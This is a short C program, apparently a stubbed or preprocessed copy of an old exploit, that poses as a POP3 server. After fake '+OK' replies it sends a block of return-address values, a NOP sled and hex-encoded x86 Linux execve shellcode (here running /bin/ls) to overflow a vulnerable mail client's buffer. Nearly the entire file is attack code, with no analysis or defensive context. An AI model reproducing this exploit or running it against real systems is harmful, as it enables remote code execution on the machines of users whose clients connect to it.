
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int shellcode ;


 int MESSAGES ;
 int SHELL_PTR ;
 int printf (char*,...) ;

int main(void)
{
 int ish = SHELL_PTR;
 int ret_offset = -10;
 char shellcode[] =
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
 "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
 int *sc = (int*) shellcode;
 int noop = 0x90909090;
 int i;


 printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);

 for (i = ret_offset-20; i < ret_offset+20; i++)
  printf("%d %d\r\n", i, ish);

 for (i = 1; i < 21; i++)
  printf("%d %d\r\n", i, noop);

 for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
  printf("%d %d\r\n", i, *sc++);
 printf(".\r\n");
 return 0;
}
